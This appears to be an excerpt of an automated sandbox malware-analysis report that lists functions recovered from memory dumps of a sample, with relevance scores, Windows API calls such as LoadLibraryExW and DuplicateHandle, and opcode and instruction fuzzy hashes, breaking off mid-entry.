Instruction ID: b59824c2081f57fd1ce7468654984ae8934fa0225dfebeee722f67db6d7ec5aa
Opcode Fuzzy Hash: 4865159595fd9bc3255e28008281f3aaede2fb2dc1b582db96309f2485b8af0d
Instruction Fuzzy Hash: DFD10574E02218CFCB14EFB4D9546ADBBB2FF8A301F1085A9D44AAB354DB315986CF51

Function 05FAA3E8 Relevance: .3, Instructions: 289COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: bb5e67421133d6b5c590657902efa6a1f8dd0793e592ad77b84b9e89c9c31920
Instruction ID: 651702470f88e963f96f286f5a5da67fbaa0d9d5d34cc3bc98af2c1dd149d414
Opcode Fuzzy Hash: bb5e67421133d6b5c590657902efa6a1f8dd0793e592ad77b84b9e89c9c31920
Instruction Fuzzy Hash: 91D1E474E01218CFCB18EFB4D9586ADBBB2FF8A302F1085A9D54AAB354DB315985CF41

Function 00C1AE30 Relevance: 1.7, APIs: 1, Instructions: 205
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C1B086

Memory Dump Source

Source File: 00000011.00000002.2152672230.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_c10000_rHCHrI9F0v.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: bbd12f97973e84934c23cf6da1ff1f7994775dd2eb93d63204e9e5c6c529dbab
Instruction ID: 121301329e6aeddfc5a1d34b1a247f9e430fc078fff84bccd9d7ef3bdebb1f2f
Opcode Fuzzy Hash: bbd12f97973e84934c23cf6da1ff1f7994775dd2eb93d63204e9e5c6c529dbab
Instruction Fuzzy Hash: 008166B0A01B058FDB24DF69D04179ABBF1FF89300F00892ED09AD7A51D775E98ADB91

Function 00C15935 Relevance: 1.6, APIs: 1, Instructions: 98
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C159F1

Memory Dump Source

Source File: 00000011.00000002.2152672230.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_c10000_rHCHrI9F0v.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 79376d2d993e33ff5b43a5f142c98307888e56b691de0e233e17194747f87ac9
Instruction ID: ca1f32a9af9aff30fe9195d859e3cfebd30ea3dc08fe45f7af6e7975e6072d00
Opcode Fuzzy Hash: 79376d2d993e33ff5b43a5f142c98307888e56b691de0e233e17194747f87ac9
Instruction Fuzzy Hash: 934104B0C00B19CFEB14CFA9C8847DDBBB6BF85304F24816AD408AB250DB756986DF90

Function 00C14248 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00C159F1

Memory Dump Source

Source File: 00000011.00000002.2152672230.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_c10000_rHCHrI9F0v.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: da7a3684c4bde1dd03304e020f3d2c610074c52683a28f52f06ee2945583607a
Instruction ID: 4176f4a26de622b1d588ed62cd3061ce9709afa02122ac85e347c95929940900
Opcode Fuzzy Hash: da7a3684c4bde1dd03304e020f3d2c610074c52683a28f52f06ee2945583607a
Instruction Fuzzy Hash: A241C270D00719CFEB24CFAAC844BDDBBB5BF85304F20816AD408AB251DB756945DF91

Function 00C1C9A0 Relevance: 1.6, APIs: 1, Instructions: 65
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C1D2C6,?,?,?,?,?), ref: 00C1D387

Memory Dump Source

Source File: 00000011.00000002.2152672230.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_c10000_rHCHrI9F0v.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 885e20e4cf9ccf445938cab3636f6449b85938541d691ec5953726d7b78ce17f
Instruction ID: 635c63413cd497f6991742b3ac1d343ea3fd10937ef9aed916d73a33f211773c
Opcode Fuzzy Hash: 885e20e4cf9ccf445938cab3636f6449b85938541d691ec5953726d7b78ce17f
Instruction Fuzzy Hash: E621E6B5900348EFDB10CF9AD984ADEFBF4EB49310F14801AE915A7310D374A950DFA5

Function 00C1D2F9 Relevance: 1.6, APIs: 1, Instructions: 60
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?,?,?,?,00C1D2C6,?,?,?,?,?), ref: 00C1D387

Memory Dump Source

Source File: 00000011.00000002.2152672230.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_c10000_rHCHrI9F0v.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: ba318318a1dcf637c246e88ced84455db1f64db76200f81b11d53ec7afeb4d89
Instruction ID: 3c35928b5407f0a006e0f8305a4dba5d7615ade69f5a106bb1d1dda2bde7ea6a
Opcode Fuzzy Hash: ba318318a1dcf637c246e88ced84455db1f64db76200f81b11d53ec7afeb4d89
Instruction Fuzzy Hash: 0321F5B5900309DFDB10CFA9E584ADEBBF5FB48310F14841AE929A3350D378A954CF65

Function 00C1B2A0 Relevance: 1.6, APIs: 1, Instructions: 56
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C1B101,00000800,00000000,00000000), ref: 00C1B312

Memory Dump Source

Source File: 00000011.00000002.2152672230.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_c10000_rHCHrI9F0v.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 5010994579c979b149fce8b4d50f4e8a89679058182e1f9d5c623f882e986c5f
Instruction ID: 63113423dacbd06f40a86ca23ad1e24b3cea650f692ef85cb5c5aa7fd938e30d
Opcode Fuzzy Hash: 5010994579c979b149fce8b4d50f4e8a89679058182e1f9d5c623f882e986c5f
Instruction Fuzzy Hash: 122133B6D00349DFDB24CFAAD444ADEBBF4AB89310F14846ED429A7210C378A945CFA5

Function 00C1A870 Relevance: 1.6, APIs: 1, Instructions: 55
libraryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadLibraryExW.KERNELBASE(00000000,00000000,?,?,?,?,00000000,?,00C1B101,00000800,00000000,00000000), ref: 00C1B312

Memory Dump Source

Source File: 00000011.00000002.2152672230.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_c10000_rHCHrI9F0v.jbxd

Similarity

API ID: LibraryLoad
String ID:
API String ID: 1029625771-0
Opcode ID: 199cf1fb15b46766981793454f2762c2b535e0931f0421d4927da9690a3e2b68
Instruction ID: d5b7a122e1025a00727f5e48824284e3ef2e2e51053ce4a849a00c28c8efdf98
Opcode Fuzzy Hash: 199cf1fb15b46766981793454f2762c2b535e0931f0421d4927da9690a3e2b68
Instruction Fuzzy Hash: ED1114B69003499FDB14CF9AD444ADEFBF4EB89310F14842EE829A7310C379A945CFA5

Function 05FA59D8 Relevance: 1.6, Strings: 1, Instructions: 305
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d, xrefs: 05FA5C29

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID: d
API String ID: 0-2564639436
Opcode ID: fb0e5fd0fba31eb79d5978cb2c6f05cd3577a7e496c336bb0a450c3eb7c466c4
Instruction ID: 45de0150b072dc6d73f9a9e6fa6ac6acf62588b2f54fb1fbf9c2d0927ec8ef4f
Opcode Fuzzy Hash: fb0e5fd0fba31eb79d5978cb2c6f05cd3577a7e496c336bb0a450c3eb7c466c4
Instruction Fuzzy Hash: A7C16775600602DFDB24DF28C980D6AB7F2FF88310B69CA69D45A8B665D734FD42CB81

Function 00C1B020 Relevance: 1.5, APIs: 1, Instructions: 47
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00C1B086

Memory Dump Source

Source File: 00000011.00000002.2152672230.0000000000C10000.00000040.00000800.00020000.00000000.sdmp, Offset: 00C10000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_c10000_rHCHrI9F0v.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: a670bff4099e560b061f529523855adbc91565c741c38d7ff0e96828bcaced24
Instruction ID: 7a75b631f65e057eeb541a3f4adea613933691421ee13f438790dea9ecf98785
Opcode Fuzzy Hash: a670bff4099e560b061f529523855adbc91565c741c38d7ff0e96828bcaced24
Instruction Fuzzy Hash: 1711E0B5C00749CFDB24CF9AD444BDEFBF4AB89310F14841AD429A7210D379AA45CFA5

Function 05F91BA0 Relevance: 1.4, Instructions: 1450
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 174934c2e7458d65f5b4aafb0d1b3a883e8713d3cf3272a5d417ae4dc50feeae
Instruction ID: ba26029c791d1318cf20f0e68a3df91993f1b0edc31a83fa1b5dd3b78b9cbb12
Opcode Fuzzy Hash: 174934c2e7458d65f5b4aafb0d1b3a883e8713d3cf3272a5d417ae4dc50feeae
Instruction Fuzzy Hash: 00C24075B006189FDB54DFA4C850B9EB7B6FF88700F118099E60AAB3A1DB71AD81CF51

Function 05F93838 Relevance: .7, Instructions: 733
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2e813ac3e04a2c705214455c101d718e925eb5bafc1287d16f842721d2c22386
Instruction ID: 4893297d59ba6e73ba802c336a49d6cdb21940f35fd3f3e4c605a5fa0120ed4d
Opcode Fuzzy Hash: 2e813ac3e04a2c705214455c101d718e925eb5bafc1287d16f842721d2c22386
Instruction Fuzzy Hash: E8521934B002149FDB44DFA8C894EAABBF6FF89704F15809AE506DB3A1DB71ED408B51

Function 05F900D8 Relevance: .7, Instructions: 676
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c5b38469aa9485b117ef0fc904f99280f91bcd5c5f70d385107c9c533c19f39c
Instruction ID: e22f81131150db2f017eca8c786010f62fe19dddcc1eedc8c08e0cb6859d6043
Opcode Fuzzy Hash: c5b38469aa9485b117ef0fc904f99280f91bcd5c5f70d385107c9c533c19f39c
Instruction Fuzzy Hash: 5F427B30700B148FEB24EBB8D454A6E72F6FBC6610B40495CD543AB390CF7AED458B86

Function 05F90D80 Relevance: .6, Instructions: 619
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: faa7f612e41b257672b84e3b233d88ec49fa0f6091a5764e4c7a6a64fa97cbb4
Instruction ID: f9868d7cde03fa79cd609ab92255a654e6703c72a8e09177620390073f0facf5
Opcode Fuzzy Hash: faa7f612e41b257672b84e3b233d88ec49fa0f6091a5764e4c7a6a64fa97cbb4
Instruction Fuzzy Hash: 2B227F30B006069FEF19DBA9C844E6EB7FBBF89604B148469E506CB3A1CB75DD41CB51

Function 05FA48B8 Relevance: .6, Instructions: 594
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 7a6f55bd220bb4547bd7309c63c3e8e9a9e450efc0f7c6e0f36f1c181370ed01
Instruction ID: a47f6d8f279eb92ee855e02b349a361a9d8713a794bf62bc2efae10e6e2127bd
Opcode Fuzzy Hash: 7a6f55bd220bb4547bd7309c63c3e8e9a9e450efc0f7c6e0f36f1c181370ed01
Instruction Fuzzy Hash: FC327A76B006058FDB14DF79D888A6EBBF6FF89200B1584A9E506CB366DB74EC01CB51

Function 05F900B9 Relevance: .3, Instructions: 337COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ab6ba75ab0fa35f552fbd0a41a75b7c50afddaf0f83340bd51390db0735f48d3
Instruction ID: 4f79919c0d6c8745242f5bad8328f50f95513eb56cdbf7b8f52ddf96acc71070
Opcode Fuzzy Hash: ab6ba75ab0fa35f552fbd0a41a75b7c50afddaf0f83340bd51390db0735f48d3
Instruction Fuzzy Hash: 5EC16E35B00A049FEB08DB68C85CB6A77BAFF89701F148066E9029B3A1CF79DD41CB51

Function 05F91584 Relevance: .3, Instructions: 335COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8db9d9791d9486c97968841feb805a1a283b751c7ecd79b3c7169e2257bb4158
Instruction ID: ceeaea85b6a5e2e44e65f4b9fdb21b74624b36be4967408f64c402351c1152db
Opcode Fuzzy Hash: 8db9d9791d9486c97968841feb805a1a283b751c7ecd79b3c7169e2257bb4158
Instruction Fuzzy Hash: 2DC1A034B00602DFEB19DBA8C454E2E77E7BB85600F108469E6038B3A5DF79DD45CB62

Function 05F90666 Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 50a7d63436119799c62b419b28aead2088193bfc1d9ddcc39ceb521ac363c0f5
Instruction ID: dfed76135c2a9a385d46096d56f0d7236ecffff1ef4273da1e2b0aedd23105eb
Opcode Fuzzy Hash: 50a7d63436119799c62b419b28aead2088193bfc1d9ddcc39ceb521ac363c0f5
Instruction Fuzzy Hash: D0B15C35B40A00DFFB08DB64C95CB6976ABFB89705F148065EA029B3A1CFB9ED41CB51

Function 05F906DE Relevance: .3, Instructions: 307COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 01b865032922bb7854acb336b628451797fca4c351af41e42369f24e529e4ffe
Instruction ID: 4205a3c22e8d83b6b1691522c4d8037382c645dade7931ed2229a53041a67486
Opcode Fuzzy Hash: 01b865032922bb7854acb336b628451797fca4c351af41e42369f24e529e4ffe
Instruction Fuzzy Hash: F9B16D35B40A049FFB08DB64C95CB2977ABFB89705F148065EA029B3A1CFB9ED41CB51

Function 05F905EE Relevance: .3, Instructions: 306COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 9e0d06bcef5785c492bf0af2faf23587fab8f4667a21f5d43b2f0a2fdf0c05fa
Instruction ID: 39e01b410db4f19657bbb0a49b4a0d2de6122fc728468dfdbc56118c53d4fcfb
Opcode Fuzzy Hash: 9e0d06bcef5785c492bf0af2faf23587fab8f4667a21f5d43b2f0a2fdf0c05fa
Instruction Fuzzy Hash: 92B16C35B00A049FFB08DB64C95CB2977ABFB89705F148065EA029B3A1CFB9ED41CB51

Function 05FA48A8 Relevance: .3, Instructions: 279COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8ed83cc2f4958898cae2d483eae09df5b9409c654f5c6d0da8898729b3b12f76
Instruction ID: b94f08dcccfdc401b8e78ca607ccbdad610b83aa8b1c05ea16f67b37748e9a31
Opcode Fuzzy Hash: 8ed83cc2f4958898cae2d483eae09df5b9409c654f5c6d0da8898729b3b12f76
Instruction Fuzzy Hash: C6B16775B006058FDB14DF39D488AAEBBF6BF88704B1580A8E406DB3A6DB74EC01CB51

Function 05FAA3B7 Relevance: .3, Instructions: 273COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0ee28a825ebab5f9817820ada9def893c36c08496d113ee4ca782989eed8178e
Instruction ID: 990952761c374987196198398a07fad32c640ca075f877f92f39ad4d87bf44d8
Opcode Fuzzy Hash: 0ee28a825ebab5f9817820ada9def893c36c08496d113ee4ca782989eed8178e
Instruction Fuzzy Hash: F7C10634E02218CFCB14EFB4D95469DBBB2FF8A302F5085A9D54AAB354DB315985CF01

Function 05FA3F3F Relevance: .2, Instructions: 181COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 169adcfd1d30553d7d58866b6150a9be64f72238f24eaa44c79058cc8c778e3b
Instruction ID: 0955a96e016edd9cc998356d6a2e1690f146211075b9ba20b7a97e4987789974
Opcode Fuzzy Hash: 169adcfd1d30553d7d58866b6150a9be64f72238f24eaa44c79058cc8c778e3b
Instruction Fuzzy Hash: 50614071F002168FCF14DFA9D484AAEB7F6BF88600B148169D905EB354EB75DC01CB91

Function 05FA6400 Relevance: .2, Instructions: 153COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ea4886271412d9f9fa3948939e6ccead0f4b88ff1e422dcc5992983d2b382abc
Instruction ID: 96224a542069d15eea853fc3363d6797d9185eb8abe2c1bb4535b37d749d667d
Opcode Fuzzy Hash: ea4886271412d9f9fa3948939e6ccead0f4b88ff1e422dcc5992983d2b382abc
Instruction Fuzzy Hash: E8514C72F002059FDB14DF79D88499ABBF6FF88210B1984AAE506D7361DB35EC01CB91

Function 05FA7D58 Relevance: .1, Instructions: 147COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c11d93df3b6a79790615b784ca3b61dff66efd59ca03a5bfe9db458387102745
Instruction ID: cb5df8d3ed159742cb5116e5306b25bd78cb3e6aa49ea3178566f4d1f8de08e1
Opcode Fuzzy Hash: c11d93df3b6a79790615b784ca3b61dff66efd59ca03a5bfe9db458387102745
Instruction Fuzzy Hash: 795127B2E01218DFDB18DFA9D884B9EBBF6FF48310F148029D415AB244DB789946CF91

Function 05F934D8 Relevance: .1, Instructions: 143COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174670753.0000000005F90000.00000040.00000800.00020000.00000000.sdmp, Offset: 05F90000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5f90000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: f9550dbdfb17717d3e1724545e3cef029ac422697be639e784e37ea2b938b01c
Instruction ID: b98a2ad81a1f2dd7a4155bfcdf356e46ddf2a998654d6293b3a3c91f06cd7588
Opcode Fuzzy Hash: f9550dbdfb17717d3e1724545e3cef029ac422697be639e784e37ea2b938b01c
Instruction Fuzzy Hash: 18512935B005159FDB44CFA9C884D9ABBF2FF89714B158069E906EB3A1DB31EC05CB50

Function 05FA7D4C Relevance: .1, Instructions: 129COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 8a8231dcd20ded15681a33ca742464217a759adbb9b3ae07e9de3d0de839aa87
Instruction ID: 0a08f198af2847ef6119b411ea702a9d265278ad635d951c880354b62837a5ae
Opcode Fuzzy Hash: 8a8231dcd20ded15681a33ca742464217a759adbb9b3ae07e9de3d0de839aa87
Instruction Fuzzy Hash: F05137B2E01258DBDB18DFA9C981BDDBBF6FF48300F148029E405AB245DB789846CF81

Function 05FA59CA Relevance: .1, Instructions: 117COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: c04343c7acc9aa2680bea083cb0545177c91342aad31c420488749219e6307be
Instruction ID: 145c20c5929106d0aca37d6875f5154ed97261845261682173a7785302c90f0d
Opcode Fuzzy Hash: c04343c7acc9aa2680bea083cb0545177c91342aad31c420488749219e6307be
Instruction Fuzzy Hash: D3418776A00606DFCB14CF19C880EAABBF2FF89310B59C998E5599B365D734F801CB80

Function 05FA3DE0 Relevance: .1, Instructions: 110COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 27e52508ec67fe8154f84acfe40d44fe933edae13577afcc1ef3e04e5ed670ed
Instruction ID: 1f9b35658211577a99201b8c979fdfa94f2dd7422b6b486bb35bbc2a9e3d9e7f
Opcode Fuzzy Hash: 27e52508ec67fe8154f84acfe40d44fe933edae13577afcc1ef3e04e5ed670ed
Instruction Fuzzy Hash: D43126727002104FDB29A778E49166E73E6EFCA254754487AE04ACB385CE39EC0B87E1

Function 05FA5579 Relevance: .1, Instructions: 103COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: e34a840672a967cd61a25187e2c66fe2f19bfe3eccd53700773c0eede1783394
Instruction ID: d355c81aef1a2c3e9e2cb2679365b4876bcfe5d69fed3cee7623b0740da9dc65
Opcode Fuzzy Hash: e34a840672a967cd61a25187e2c66fe2f19bfe3eccd53700773c0eede1783394
Instruction Fuzzy Hash: B6319E75B002019FDF19DF35D884AAEBBB2FF89600B548469E905CB359DB35ED02CB91

Function 05FA84C8 Relevance: .1, Instructions: 100COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: b6feb7a579367aa23cf2eaad998c38e773640223e504068e6c97026a1c1404d0
Instruction ID: ce7b36b482c2fb717068164454b20ce212e7aeba8269830284519f4a7eafbf15
Opcode Fuzzy Hash: b6feb7a579367aa23cf2eaad998c38e773640223e504068e6c97026a1c1404d0
Instruction Fuzzy Hash: D031AD71B002058FEF08EBB9A46416F37E3ABC8315750447AD54ADB3C4EE35DE068795

Function 05FA5588 Relevance: .1, Instructions: 96COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 0629dcc2fe8923cc24e50ada0238f0b06ff25a30157a47c55cf06791947f85b2
Instruction ID: 040202043f62c6294fc6bdcad674635025d77fdbd37c726bc7912025a6c4c2bf
Opcode Fuzzy Hash: 0629dcc2fe8923cc24e50ada0238f0b06ff25a30157a47c55cf06791947f85b2
Instruction Fuzzy Hash: 21317A75B012109FCB05DF38D8849AEBBB2FF89200B048469E906CB355DB34ED02CB91

Function 05FA87A0 Relevance: .1, Instructions: 93COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: ec450f6cd9916d28c73c137ecadbed8f81fea8798392f14ef490c65f555a5f9d
Instruction ID: 73715795053883f621c18aac933f9f7740a1595846a0572a80b0f323ba310a73
Opcode Fuzzy Hash: ec450f6cd9916d28c73c137ecadbed8f81fea8798392f14ef490c65f555a5f9d
Instruction Fuzzy Hash: 934114B2D01208DFDB14DFAAD844ADEFBF6AF88310F14802AE415B7250DB79A945CF91

Function 05FAC0B5 Relevance: .1, Instructions: 82COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_17_2_5fa0000_rHCHrI9F0v.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 31da70becfd0eddbc6f73696dce00e9cad65ee7cda26267f56e3a19c0199398d
Instruction ID: ea44c967a97ba9241820689da7fd206d990452716f1d758cdbf302faebed1991
Opcode Fuzzy Hash: 31da70becfd0eddbc6f73696dce00e9cad65ee7cda26267f56e3a19c0199398d
Instruction Fuzzy Hash: 0421492110B7E46FD303A779EC65AE73FA59E8352870901C7E081CF163D6195A48C7EB

Function 05FA8795 Relevance: .1, Instructions: 79COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000011.00000002.2174743445.0000000005FA0000.00000040.00000800.00020000.00000000.sdmp, Offset: 05FA0000, based on PE: false

